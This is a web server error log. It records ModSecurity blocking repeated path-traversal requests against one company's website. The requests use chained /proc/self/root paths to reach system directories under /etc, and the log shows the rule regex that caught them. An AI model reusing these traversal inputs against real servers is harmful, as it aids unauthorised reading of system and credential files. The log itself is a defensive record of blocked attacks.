[Mon Mar 16 16:42:54.493147 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.243.203:60164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdPrABkC4fWIHEf8EGcAAAAEw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:55.840864 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:60166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdP9SswJuvopo3lOhyiAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:57.015889 2026] [:error] [pid 29507:tid 140411557287680] [client 74.7.243.203:60174] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdQUr9dMAiw-8KANNZ2gAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:58.338947 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:60178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdQtSswJuvopo3lOhyigAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:42:59.495548 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:60190] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdQ9SswJuvopo3lOhyjAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:00.872990 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.243.203:37742] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdREr9dMAiw-8KANNZ3wAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:02.037389 2026] [:error] [pid 10651:tid 140411733534464] [client 74.7.243.203:37752] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdRrysWC90G-1nBrBXOAAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:02.041908 2026] [mime_magic:error] [pid 10651:tid 140411733534464] (70014)End of file found: [client 74.7.243.203:37752] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:02.670429 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:37760] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdRrysWC90G-1nBrBXOQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:03.854900 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:37776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdR7ABkC4fWIHEf8EGcwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:05.048693 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:37780] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdSbABkC4fWIHEf8EGdAAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:05.857945 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:57038] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdSf9ocpUE4ed4uDwF7AAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:07.162800 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:52148] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdS8_BxrYCr4hPDw_91gAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:08.344528 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:48756] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdTI6lpbStxTqkSkt97wAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:08.661214 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:37784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdTLysWC90G-1nBrBXPAAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:11.803863 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:48770] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdT46lpbStxTqkSkt98wAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:14.210900 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:48782] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdUqQpVkWug9HeOt9I5gAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:14.415106 2026] [:error] [pid 29802:tid 140411540502272] [client 74.7.243.203:37800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdUs_BxrYCr4hPDw_92wAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:43:15.470093 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:48784] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdU9SswJuvopo3lOhyjQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:17.923115 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.241.46:48800] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdVLysWC90G-1nBrBXPgAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:19.406788 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:58856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdV7ysWC90G-1nBrBXQwAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:43:20.651257 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:58870] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhdWLysWC90G-1nBrBXRwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
